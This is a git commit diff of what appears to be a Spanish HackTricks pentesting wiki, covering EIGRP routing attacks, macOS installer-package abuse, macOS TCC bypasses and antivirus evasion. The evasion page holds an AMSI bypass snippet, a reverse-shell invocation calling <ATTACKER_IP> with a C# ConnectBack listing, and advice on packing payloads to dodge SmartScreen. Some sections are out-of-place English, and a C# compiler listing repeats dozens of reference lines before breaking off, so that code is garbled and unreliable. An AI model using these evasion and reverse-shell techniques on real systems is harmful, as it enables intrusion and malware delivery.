Translated ['generic-methodologies-and-resources/pentesting-network/eigr

This commit is contained in:
Translator 2023-06-14 17:49:45 +00:00
parent e8ef4e09d8
commit b274966899
10 changed files with 366 additions and 69 deletions

Binary file not shown.

After

Width:  |  Height:  |  Size: 143 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 143 KiB

After

Width:  |  Height:  |  Size: 44 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 44 KiB

After

Width:  |  Height:  |  Size: 84 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 58 KiB

After

Width:  |  Height:  |  Size: 514 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 358 KiB

After

Width:  |  Height:  |  Size: 51 KiB

View File

@ -59,32 +59,45 @@ EIGRP (Enhanced Interior Gateway Routing Protocol) is a Cisco proprietary routin
#### EIGRP Protocol Overview
EIGRP uses a hierarchical network design that consists of the following components:
EIGRP uses a hierarchical network design that consists of multiple autonomous systems (AS). Each AS is identified by a unique number called Autonomous System Number (ASN). EIGRP routers within the same AS exchange routing information using EIGRP packets. EIGRP packets are sent using multicast address 224.0.0.10.
- Autonomous System (AS): A collection of networks that are under a common administrative domain.
- Router: A device that forwards data packets between networks.
- Neighbor: A router that shares routing information with another router.
- Topology Table: A database that stores information about all known routes in the network.
- Routing Table: A database that stores the best routes to each destination network.
- Metrics: A set of values that are used to calculate the best path to a destination network.
#### EIGRP Packet Types
EIGRP uses five packet types to exchange routing information:
- **Hello**: Used to discover and maintain neighbor relationships.
- **Update**: Used to advertise routing information.
- **Query**: Used to request missing routing information.
- **Reply**: Used to respond to a query packet.
- **Acknowledgment**: Used to acknowledge receipt of an EIGRP packet.
#### EIGRP Authentication
EIGRP supports two types of authentication:
- **Plain text authentication**: Uses a clear-text password that is sent in EIGRP packets.
- **MD5 authentication**: Uses a hash-based message authentication code (HMAC) that is calculated using a shared secret key.
#### EIGRP Attacks
EIGRP is vulnerable to the following attacks:
EIGRP is vulnerable to various attacks that can be used to disrupt network operations or steal sensitive information. The following are some of the common EIGRP attacks:
- Eavesdropping: An attacker can intercept EIGRP packets and obtain sensitive information such as network topology, routing tables, and metrics.
- Spoofing: An attacker can send fake EIGRP packets to a router and manipulate its routing table. This can lead to traffic redirection, black-holing, and denial of service (DoS) attacks.
- Injection: An attacker can inject fake EIGRP packets into the network to advertise false routes. This can lead to traffic interception, man-in-the-middle (MitM) attacks, and data leakage.
- DoS: An attacker can flood the network with EIGRP packets to consume network resources and cause network congestion.
- **Eavesdropping**: An attacker can use a packet sniffer to capture EIGRP packets and extract sensitive information such as network topology, IP addresses, and passwords.
- **Spoofing**: An attacker can spoof EIGRP packets to inject false routing information or modify existing routing information. This can cause network congestion, black holes, or routing loops.
- **DoS**: An attacker can launch a DoS (Denial of Service) attack by flooding the network with EIGRP packets or by sending malformed EIGRP packets that can crash EIGRP routers.
- **Brute force**: An attacker can use a brute-force attack to guess the plain-text password used for EIGRP authentication.
- **MD5 hash leak**: If an attacker can obtain the MD5 hash of the shared secret key used for EIGRP authentication, they can use a brute-force attack to guess the key and authenticate themselves as a legitimate EIGRP router.
#### EIGRP Countermeasures
To mitigate EIGRP attacks, the following countermeasures can be implemented:
- Authentication: EIGRP supports MD5 authentication to prevent unauthorized access to the network. This ensures that only trusted routers can exchange routing information.
- Encryption: EIGRP supports IPsec encryption to protect the confidentiality and integrity of routing information. This ensures that sensitive information cannot be intercepted or modified by attackers.
- Access Control: EIGRP packets should be filtered at the network perimeter to prevent unauthorized access to the network. This ensures that only legitimate traffic is allowed to enter the network.
- Monitoring: EIGRP packets should be monitored for anomalies such as unexpected traffic patterns, high packet rates, and unusual packet sizes. This ensures that attacks can be detected and mitigated in a timely manner.
- **Encryption**: EIGRP packets can be encrypted using IPsec to prevent eavesdropping and spoofing attacks.
- **Authentication**: EIGRP authentication should be enabled using MD5 authentication to prevent unauthorized access.
- **Access control**: Access to EIGRP routers should be restricted to authorized personnel only.
- **Logging**: EIGRP routers should be configured to log all EIGRP-related events for auditing and troubleshooting purposes.
- **Updates filtering**: EIGRP routers should be configured to filter incoming routing updates to prevent the injection of false routing information.
- **DoS protection**: EIGRP routers should be configured to limit the rate of incoming EIGRP packets to prevent DoS attacks.
```
Inguz# show version
```
@ -166,7 +179,7 @@ Como se puede ver, el host pierde conectividad con el host **172.16.100.140/32**
Para establecer vecinos EIGRP, **los routers usan valores K especiales.** Estos deben ser iguales entre todos los vecinos EIGRP. Si al menos un valor K no coincide, el dominio EIGRP se bloqueará y la vecindad se romperá. Usaremos [**relationshipnightmare.py**](https://github.com/in9uz/EIGRPWN/blob/main/relationshipnightmare.py) \*\*\*\* para realizar este ataque\*\*.\*\*
<figure><img src="../../.gitbook/assets/image (12) (2).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../../.gitbook/assets/image (12) (2) (1).png" alt=""><figcaption></figcaption></figure>
Argumentos del script:

View File

@ -1,6 +1,6 @@
## Información Básica
## Información básica de Pkg
Un paquete de instalación de macOS (también conocido como archivo `.pkg`) es un formato de archivo utilizado por macOS para **distribuir software**. Estos archivos son como una **caja que contiene todo lo que un software necesita para instalarse y ejecutarse correctamente**.
Un paquete de instalación de macOS (también conocido como archivo `.pkg`) es un formato de archivo utilizado por macOS para **distribuir software**. Estos archivos son como una **caja que contiene todo lo que un software** necesita para instalarse y ejecutarse correctamente.
El archivo del paquete en sí es un archivo que contiene una **jerarquía de archivos y directorios que se instalarán en el equipo de destino**. También puede incluir **scripts** para realizar tareas antes y después de la instalación, como configurar archivos de configuración o limpiar versiones antiguas del software.
@ -28,11 +28,25 @@ xar -xf "/path/to/package.pkg"
cat Scripts | gzip -dc | cpio -i
cpio -i < Scripts
```
## Privesc a través del abuso de paquetes
## Información básica de DMG
Los archivos DMG, o imágenes de disco de Apple, son un formato de archivo utilizado por el sistema operativo macOS de Apple para imágenes de disco. Un archivo DMG es esencialmente una **imagen de disco montable** (contiene su propio sistema de archivos) que contiene datos de bloque sin procesar, generalmente comprimidos y a veces cifrados. Cuando abres un archivo DMG, macOS lo **monta como si fuera un disco físico**, lo que te permite acceder a su contenido.
### Jerarquía
<figure><img src="../../../.gitbook/assets/image (12).png" alt=""><figcaption></figcaption></figure>
La jerarquía de un archivo DMG puede ser diferente según el contenido. Sin embargo, para los DMG de aplicaciones, generalmente sigue esta estructura:
* Nivel superior: este es la raíz de la imagen del disco. A menudo contiene la aplicación y posiblemente un enlace a la carpeta de Aplicaciones.
* Aplicación (.app): esta es la aplicación real. En macOS, una aplicación es típicamente un paquete que contiene muchos archivos y carpetas individuales que conforman la aplicación.
* Enlace de Aplicaciones: este es un acceso directo a la carpeta de Aplicaciones en macOS. El propósito de esto es hacer que sea fácil para ti instalar la aplicación. Puedes arrastrar el archivo .app a este acceso directo para instalar la aplicación.
## Escalada de privilegios a través del abuso de pkg
### Ejecución desde directorios públicos
Si un script de pre o post instalación se está ejecutando desde **`/var/tmp/Installerutil`**, un atacante podría controlar ese script para escalar privilegios cada vez que se ejecute. Otro ejemplo similar:
Si un script de pre o post instalación se está ejecutando, por ejemplo, desde **`/var/tmp/Installerutil`**, un atacante podría controlar ese script para escalar privilegios cada vez que se ejecute. Otro ejemplo similar:
<figure><img src="../../../.gitbook/assets/Pasted Graphic 5.png" alt=""><figcaption></figcaption></figure>
@ -52,18 +66,31 @@ Si un instalador escribe en `/tmp/fixedname/bla/bla`, es posible **crear un mont
Un ejemplo de esto es **CVE-2021-26089** que logró **sobrescribir un script periódico** para obtener la ejecución como root. Para obtener más información, consulte la charla: [**OBTS v4.0: "Mount(ain) of Bugs" - Csaba Fitzl**](https://www.youtube.com/watch?v=jSYPazD4VcE)
## pkg como malware
### Carga útil vacía
Es posible generar un archivo **`.pkg`** con **scripts de pre y post-instalación** sin ninguna carga útil.
### JS en xml de distribución
Es posible agregar etiquetas **`<script>`** en el archivo **xml de distribución** del paquete y ese código se ejecutará y puede **ejecutar comandos** usando **`system.run`**:
<figure><img src="../../../.gitbook/assets/image (14).png" alt=""><figcaption></figcaption></figure>
## Referencias
* [**DEF CON 27 - Unpacking Pkgs A Look Inside Macos Installer Packages And Common Security Flaws**](https://www.youtube.com/watch?v=iASSG0\_zobQ)
* [**OBTS v4.0: "The Wild World of macOS Installers" - Tony Lambert**](https://www.youtube.com/watch?v=Eow5uNHtmIg)
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Comparte tus trucos de hacking enviando PR al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
* ¿Trabaja en una **empresa de ciberseguridad**? ¿Quiere ver su **empresa anunciada en HackTricks**? ¿O quiere tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulte los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Descubra [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección de [**NFT exclusivos**](https://opensea.io/collection/the-peass-family)
* Obtenga el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
* **Únase al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegramas**](https://t.me/peass) o **sígame** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Comparta sus trucos de hacking enviando PR al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

View File

@ -1,22 +1,8 @@
## Bypasses de TCC en macOS
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Consigue la [**merchandising oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Comparte tus trucos de hacking enviando PRs al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>
## Por funcionalidad
### Bypass de escritura
Esto no es un bypass, es simplemente cómo funciona TCC: **no protege de la escritura**. Si Terminal **no tiene acceso para leer el Escritorio de un usuario, aún puede escribir en él**:
Esto no es un bypass, es simplemente cómo funciona TCC: **no protege de la escritura**. Si Terminal **no tiene acceso para leer el escritorio de un usuario, aún puede escribir en él**:
```shell-session
username@hostname ~ % ls Desktop
ls: Desktop: Operation not permitted
@ -30,7 +16,7 @@ El **atributo extendido `com.apple.macl`** se agrega al nuevo **archivo** para d
### Bypass de SSH
Por defecto, un acceso a través de **SSH** tendrá **"Acceso completo al disco"**. Para desactivarlo, debe estar en la lista pero desactivado (eliminarlo de la lista no eliminará esos privilegios):
Por defecto, un acceso a través de **SSH** tendrá **"Acceso completo al disco"**. Para desactivar esto, debe estar en la lista pero desactivado (eliminarlo de la lista no eliminará esos privilegios):
![](<../../../../.gitbook/assets/image (569).png>)
@ -38,6 +24,10 @@ Aquí puede encontrar ejemplos de cómo algunos **malwares han podido evitar est
* [https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/](https://www.jamf.com/blog/zero-day-tcc-bypass-discovered-in-xcsset-malware/)
{% hint style="danger" %}
Tenga en cuenta que ahora, para poder habilitar SSH, necesita **Acceso completo al disco**
{% endhint %}
### Manejar extensiones - CVE-2022-26767
El atributo **`com.apple.macl`** se otorga a los archivos para dar a una **aplicación específica permisos para leerlo**. Este atributo se establece cuando se **arrastra y suelta** un archivo sobre una aplicación, o cuando un usuario **hace doble clic** en un archivo para abrirlo con la **aplicación predeterminada**.
@ -46,7 +36,7 @@ Por lo tanto, un usuario podría **registrar una aplicación maliciosa** para ma
### iCloud
Con el permiso **`com.apple.private.icloud-account-access`** es posible comunicarse con el servicio XPC **`com.apple.iCloudHelper`** que **proporcionará tokens de iCloud**.
Con el permiso **`com.apple.private.icloud-account-access`** es posible comunicarse con el servicio XPC **`com.apple.iCloudHelper`**, que proporcionará tokens de iCloud.
**iMovie** y **Garageband** tenían este permiso y otros que lo permitían.
@ -60,7 +50,7 @@ Para obtener más información sobre Apple Scripts, consulte:
[macos-apple-scripts.md](macos-apple-scripts.md)
{% endcontent-ref %}
Por ejemplo, si una aplicación tiene **permiso de Automatización sobre `iTerm`**, como en este ejemplo **`Terminal`** tiene acceso sobre iTerm:
Por ejemplo, si una aplicación tiene **permiso de Automatización sobre `iTerm`**, en este ejemplo **`Terminal`** tiene acceso sobre iTerm:
<figure><img src="../../../../.gitbook/assets/image (2) (2) (1).png" alt=""><figcaption></figcaption></figure>
@ -243,7 +233,7 @@ Executable=/Applications/Firefox.app/Contents/MacOS/firefox
</dict>
</plist>
```
Para obtener más información sobre cómo explotar esto fácilmente, consulte el [**informe original**](https://wojciechregula.blog/post/how-to-rob-a-firefox/).
Para obtener más información sobre cómo explotar esto, consulte el [**informe original**](https://wojciechregula.blog/post/how-to-rob-a-firefox/).
### CVE-2020-10006
@ -292,10 +282,10 @@ exploit_location]; task.standardOutput = pipe;
```
## Mediante montaje
### CVE-2020-9771 - Bypass de TCC y escalada de privilegios de mount\_apfs
### CVE-2020-9771 - Bypass de TCC de montaje_apfs y escalada de privilegios
**Cualquier usuario** (incluso los no privilegiados) puede crear y montar una instantánea de Time Machine y **acceder a TODOS los archivos** de esa instantánea.\
El **único privilegio** necesario es que la aplicación utilizada (como `Terminal`) tenga acceso de **Acceso completo al disco** (FDA) (`kTCCServiceSystemPolicyAllfiles`), que debe ser otorgado por un administrador.
El **único privilegio** necesario es que la aplicación utilizada (como `Terminal`) tenga acceso de **Acceso completo al disco** (FDA) (`kTCCServiceSystemPolicyAllfiles`) que debe ser otorgado por un administrador.
{% code overflow="wrap" %}
```bash

View File

@ -135,7 +135,7 @@ lsappinfo list #Installed Apps
launchtl list #Services
```
### Procesos de Usuario
```
```bash
# will print all the running services under that particular user domain.
launchctl print gui/<users UID>
@ -145,14 +145,20 @@ launchctl print system
# will print detailed information about the specific launch agent. And if its not running or youve mistyped, you will get some output with a non-zero exit code: Could not find service “com.company.launchagent.label” in domain for login
launchctl print gui/<user's UID>/com.company.launchagent.label
```
### Crear un usuario
Sin solicitudes
<figure><img src="../.gitbook/assets/image (13).png" alt=""><figcaption></figcaption></figure>
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* ¿Trabajas en una **empresa de ciberseguridad**? ¿Quieres ver tu **empresa anunciada en HackTricks**? ¿O quieres tener acceso a la **última versión de PEASS o descargar HackTricks en PDF**? ¡Consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Descubre [**The PEASS Family**](https://opensea.io/collection/the-peass-family), nuestra colección exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* Obtén la [**oficial PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) **grupo de Discord** o al [**grupo de telegram**](https://t.me/peass) o **sígueme en** **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live).
* **Comparte tus trucos de hacking enviando PRs al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
* Obtén el [**swag oficial de PEASS y HackTricks**](https://peass.creator-spring.com)
* **Únete al** [**💬**](https://emojipedia.org/speech-balloon/) [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Comparte tus trucos de hacking enviando PR al** [**repositorio de hacktricks**](https://github.com/carlospolop/hacktricks) **y al** [**repositorio de hacktricks-cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

View File

@ -122,7 +122,7 @@ Estos son los resultados:
## [**Freeze**](https://github.com/optiv/Freeze)
`Freeze es un conjunto de herramientas de carga útil para eludir los EDR mediante procesos suspendidos, llamadas al sistema directas y métodos de ejecución alternativos`
`Freeze es un conjunto de herramientas de carga útil para eludir los EDR mediante procesos suspendidos, llamadas directas al sistema y métodos de ejecución alternativos`
Puedes usar Freeze para cargar y ejecutar tu shellcode de manera sigilosa.
```
@ -139,7 +139,7 @@ La evasión es solo un juego del gato y el ratón, lo que funciona hoy podría s
## AMSI (Interfaz de Escaneo Anti-Malware)
AMSI fue creado para prevenir el "malware sin archivo". Inicialmente, los antivirus solo podían escanear **archivos en el disco**, por lo que si de alguna manera pudieras ejecutar cargas útiles **directamente en la memoria**, el antivirus no podría hacer nada para evitarlo, ya que no tenía suficiente visibilidad.
AMSI fue creado para prevenir el "malware sin archivo". Inicialmente, los antivirus solo podían escanear **archivos en disco**, por lo que si de alguna manera pudieras ejecutar cargas útiles **directamente en la memoria**, el antivirus no podría hacer nada para evitarlo, ya que no tenía suficiente visibilidad.
La función AMSI está integrada en estos componentes de Windows.
@ -165,7 +165,7 @@ Hay un par de formas de evitar AMSI:
Dado que AMSI funciona principalmente con detecciones estáticas, modificar los scripts que intentas cargar puede ser una buena manera de evadir la detección.
Sin embargo, AMSI tiene la capacidad de desobfuscatear scripts incluso si tiene múltiples capas, por lo que la obfuscación podría ser una mala opción dependiendo de cómo se haga. Esto hace que no sea tan sencillo evadirlo. Aunque a veces, todo lo que necesitas hacer es cambiar un par de nombres de variables y estarás bien, por lo que depende de cuánto se haya marcado algo.
Sin embargo, AMSI tiene la capacidad de desobfuscatear scripts incluso si tiene múltiples capas, por lo que la obfuscación podría ser una mala opción dependiendo de cómo se haga. Esto hace que no sea tan sencillo evadirlo. Aunque, a veces, todo lo que necesitas hacer es cambiar un par de nombres de variables y estarás bien, por lo que depende de cuánto se haya marcado algo.
* **Bypass de AMSI**
@ -193,7 +193,7 @@ Try{#Ams1 bypass technic nº 2
$Spotfix.SetValue($null,$true)
}Catch{Throw $_}
```
Ten en cuenta que esto probablemente será detectado una vez que se publique este post, por lo que no debes publicar ningún código si tu plan es mantenerse indetectable.
Ten en cuenta que esto probablemente será detectado una vez que se publique esta publicación, por lo que no debes publicar ningún código si tu plan es permanecer indetectable.
**Parcheo de memoria**
@ -207,12 +207,12 @@ También hay muchas otras técnicas utilizadas para evitar AMSI con powershell,
## Ofuscación
Existen varias herramientas que se pueden utilizar para **ofuscar el código claro de C#**, generar **plantillas de metaprogramación** para compilar binarios u **ofuscar binarios compilados** como:
Existen varias herramientas que se pueden utilizar para **ofuscar el código C# en texto claro**, generar **plantillas de metaprogramación** para compilar binarios u **ofuscar binarios compilados** como:
* [**InvisibilityCloak**](https://github.com/h4wkst3r/InvisibilityCloak)**: ofuscador de C#**
* [**Obfuscator-LLVM**](https://github.com/obfuscator-llvm/obfuscator): El objetivo de este proyecto es proporcionar un fork de código abierto del conjunto de compilación [LLVM](http://www.llvm.org/) capaz de proporcionar una mayor seguridad del software a través de la [ofuscación de código](http://en.wikipedia.org/wiki/Obfuscation\_\(software\)) y la protección contra manipulaciones.
* [**ADVobfuscator**](https://github.com/andrivet/ADVobfuscator): ADVobfuscator demuestra cómo utilizar el lenguaje `C++11/14` para generar, en tiempo de compilación, código ofuscado sin utilizar ninguna herramienta externa y sin modificar el compilador.
* [**obfy**](https://github.com/fritzone/obfy): Añade una capa de operaciones ofuscadas generadas por el marco de metaprogramación de plantillas de C++ que hará la vida de la persona que quiera crackear la aplicación un poco más difícil.
* [**obfy**](https://github.com/fritzone/obfy): Agrega una capa de operaciones ofuscadas generadas por el marco de metaprogramación de plantillas C++ que hará la vida de la persona que quiera crackear la aplicación un poco más difícil.
* [**Alcatraz**](https://github.com/weak1337/Alcatraz)**:** Alcatraz es un ofuscador de binarios x64 que es capaz de ofuscar varios archivos pe diferentes, incluyendo: .exe, .dll, .sys
* [**metame**](https://github.com/a0rtega/metame): Metame es un motor de código metamórfico simple para ejecutables arbitrarios.
* [**ropfuscator**](https://github.com/ropfuscator/ropfuscator): ROPfuscator es un marco de ofuscación de código de grano fino para lenguajes compatibles con LLVM que utilizan ROP (programación orientada a la devolución). ROPfuscator ofusca un programa a nivel de código de ensamblador transformando las instrucciones regulares en cadenas ROP, frustrando nuestra concepción natural del flujo de control normal.
@ -227,7 +227,7 @@ Microsoft Defender SmartScreen es un mecanismo de seguridad destinado a proteger
<figure><img src="../.gitbook/assets/image (1) (4).png" alt=""><figcaption></figcaption></figure>
SmartScreen funciona principalmente con un enfoque basado en la reputación, lo que significa que las aplicaciones descargadas de forma poco común activarán SmartScreen, lo que alertará y evitará que el usuario final ejecute el archivo (aunque el archivo aún se puede ejecutar haciendo clic en Más información -> Ejecutar de todos modos).
SmartScreen funciona principalmente con un enfoque basado en la reputación, lo que significa que las aplicaciones descargadas de manera poco común activarán SmartScreen, lo que alertará y evitará que el usuario final ejecute el archivo (aunque el archivo aún se puede ejecutar haciendo clic en Más información -> Ejecutar de todos modos).
**MoTW** (Mark of The Web) es un [flujo de datos alternativo de NTFS](https://en.wikipedia.org/wiki/NTFS#Alternate\_data\_stream\_\(ADS\)) con el nombre de Zone.Identifier que se crea automáticamente al descargar archivos de Internet, junto con la URL de la que se descargó.
@ -237,9 +237,9 @@ SmartScreen funciona principalmente con un enfoque basado en la reputación, lo
Es importante tener en cuenta que los ejecutables firmados con un certificado de firma **confiable** no activarán SmartScreen.
{% endhint %}
Una forma muy efectiva de evitar que tus cargas útiles obtengan la marca de la web es empaquetarlas dentro de algún tipo de contenedor como un ISO. Esto sucede porque la marca de la web (MOTW) **no se puede aplicar** a **volúmenes no NTFS**.
Una forma muy efectiva de evitar que tus cargas útiles obtengan la marca de la web es empaquetarlas dentro de algún tipo de contenedor como un ISO. Esto sucede porque la marca de la web (MOTW) **no se puede aplicar** a **volúmenes que no sean NTFS**.
<figure><img src="../.gitbook/assets/image (12).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../.gitbook/assets/image (12) (2).png" alt=""><figcaption></figcaption></figure>
[**PackMyPayload**](https://github.com/mgeeky/PackMyPayload/) es una herramienta que empaqueta cargas útiles en contenedores de salida para evitar la marca de la web.
@ -309,7 +309,7 @@ La evasión es un tema muy complicado, a veces tienes que tener en cuenta muchas
Cada entorno contra el que te enfrentes tendrá sus propias fortalezas y debilidades.
Te animo a que veas esta charla de [@ATTL4S](https://twitter.com/DaniLJ94), para tener una idea de las técnicas de evasión más avanzadas.
Te animo a que veas esta charla de [@ATTL4S](https://twitter.com/DaniLJ94), para obtener un punto de apoyo en técnicas de evasión más avanzadas.
{% embed url="https://vimeo.com/502507556?embedded=true&owner=32913914&source=vimeo_logo" %}
@ -418,13 +418,13 @@ El empaquetado es el proceso de comprimir y cifrar nuestro código para hacerlo
- **PyInstaller**: PyInstaller es una herramienta que puede empaquetar nuestro código en un archivo ejecutable independiente.
- **cx_Freeze**: cx_Freeze es una herramienta similar a PyInstaller que puede empaquetar nuestro código en un archivo ejecutable independiente.
- **UPX**: UPX es una herramienta que puede comprimir nuestro archivo ejecutable para hacerlo más pequeño y más difícil de entender para las herramientas de análisis.
- **Cifrado**: podemos cifrar nuestro archivo ejecutable para hacerlo más difícil de entender para las herramientas de análisis.
## Conclusión
La ofuscación y el empaquetado son técnicas efectivas para evadir la detección de AV. Sin embargo, es importante tener en cuenta que estas técnicas no son infalibles y que los AV están constantemente mejorando sus capacidades de detección. Por lo tanto, es importante utilizar estas técnicas junto con otras medidas de seguridad, como la firma de código y el cifrado de comunicaciones, para garantizar la seguridad de nuestro código.
La ofuscación y el empaquetado son técnicas efectivas para evadir la detección de AV. Al utilizar estas técnicas, podemos hacer que nuestro código sea más difícil de entender para las herramientas de análisis y, por lo tanto, evadir la detección. Sin embargo, es importante tener en cuenta que estas técnicas no son infalibles y que los AV están constantemente mejorando su capacidad para detectar malware.
```
back.exe <ATTACKER_IP> <PORT>
```
@ -500,9 +500,270 @@ namespace ConnectBack
}
}
```
[https://gist.githubusercontent.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc/raw/1b6c32ef6322122a98a1912a794b48788edf6bad/Simple\_Rev\_Shell.cs](https://gist.githubusercontent.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc/raw/1b6c32ef6322122a98a1912a794b48788edf6bad/Simple\_Rev\_Shell.cs)
### C# usando el compilador
### C# usando compilador
En algunos casos, los antivirus pueden detectar el código malicioso en un archivo compilado. Para evitar esto, podemos usar el compilador de C# para compilar nuestro código en tiempo de ejecución. Esto se puede hacer utilizando la clase `CSharpCodeProvider` de la biblioteca `System.CodeDom.Compiler`.
Primero, necesitamos agregar una referencia a la biblioteca `System.CodeDom.Compiler`. Luego, podemos usar el siguiente código para compilar nuestro archivo C#:
```csharp
using System;
using System.CodeDom.Compiler;
using System.Collections.Generic;
using System.Diagnostics;
using System.IO;
using System.Linq;
using System.Reflection;
using System.Text;
using Microsoft.CSharp;
namespace Compiler
{
class Program
{
static void Main(string[] args)
{
var provider = new CSharpCodeProvider();
var parameters = new CompilerParameters();
parameters.GenerateExecutable = true;
parameters.OutputAssembly = "output.exe";
parameters.CompilerOptions = "/target:winexe";
parameters.ReferencedAssemblies.Add("System.dll");
parameters.ReferencedAssemblies.Add("System.Core.dll");
parameters.ReferencedAssemblies.Add("System.Windows.Forms.dll");
parameters.ReferencedAssemblies.Add("System.Management.dll");
parameters.ReferencedAssemblies.Add("System.Drawing.dll");
parameters.ReferencedAssemblies.Add("Microsoft.VisualBasic.dll");
parameters.ReferencedAssemblies.Add("System.Data.dll");
parameters.ReferencedAssemblies.Add("System.Xml.dll");
parameters.ReferencedAssemblies.Add("System.Xml.Linq.dll");
parameters.ReferencedAssemblies.Add("System.Configuration.dll");
parameters.ReferencedAssemblies.Add("System.Security.dll");
parameters.ReferencedAssemblies.Add("System.Numerics.dll");
parameters.ReferencedAssemblies.Add("System.Runtime.Serialization.dll");
parameters.ReferencedAssemblies.Add("System.ServiceModel.dll");
parameters.ReferencedAssemblies.Add("System.ServiceModel.Web.dll");
parameters.ReferencedAssemblies.Add("System.IdentityModel.dll");
parameters.ReferencedAssemblies.Add("System.ServiceModel.Activation.dll");
parameters.ReferencedAssemblies.Add("System.ServiceModel.Discovery.dll");
parameters.ReferencedAssemblies.Add("System.ServiceModel.Routing.dll");
parameters.ReferencedAssemblies.Add("System.Activities.dll");
parameters.ReferencedAssemblies.Add("System.Activities.Core.Presentation.dll");
parameters.ReferencedAssemblies.Add("System.Activities.Presentation.dll");
parameters.ReferencedAssemblies.Add("System.ServiceModel.Activities.dll");
